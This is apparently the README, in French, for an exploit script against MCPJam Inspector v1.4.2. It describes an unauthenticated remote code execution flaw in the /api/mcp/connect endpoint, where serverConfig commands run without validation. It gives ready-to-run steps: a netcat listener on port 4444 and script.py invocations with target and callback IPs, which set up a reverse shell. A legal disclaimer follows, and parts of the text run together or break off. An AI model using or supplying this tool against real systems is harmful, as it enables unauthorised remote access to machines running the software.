
Cet utilitaire a été créé lors de recherches impliquant MCPJam v1.4.2. L'application expose un point de terminaison API qui accepte un objet de configuration serveur. Sous certaines conditions, une validation insuffisante peut permettre une exécution de commande non intentionnelle.
MCPJam Inspector contient une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans le point d'accès /api/mcp/connect. Cette vulnérabilité permet aux attaquants d'exécuter des commandes arbitraires en envoyant une charge utile malveillante de configuration de serveur MCP.
Le point d'accès accepte une charge utile JSON avec un objet serverConfig contenant un tableau command et args, qui sont exécutés directement sur le système sans validation ni assainissement appropriés.
requests : pip install requestsnetcat ou socat pour l'écouteurTerminal 1 - Démarrer l'écouteur :
nc -lvnp 4444
Terminal 2 - Exécuter l'exploit :
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# Par défaut (port 6274, port de rappel 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# Port MCPJam personnalisé
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# Port d'écoute personnalisé
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect⚠️ AVERTISSEMENT :
Cet exploit est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès non autorisé aux systèmes informatiques est illégal. Les utilisateurs sont seuls responsables de :
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil. Utilisez-le à vos propres risques.
/api/mcp/connect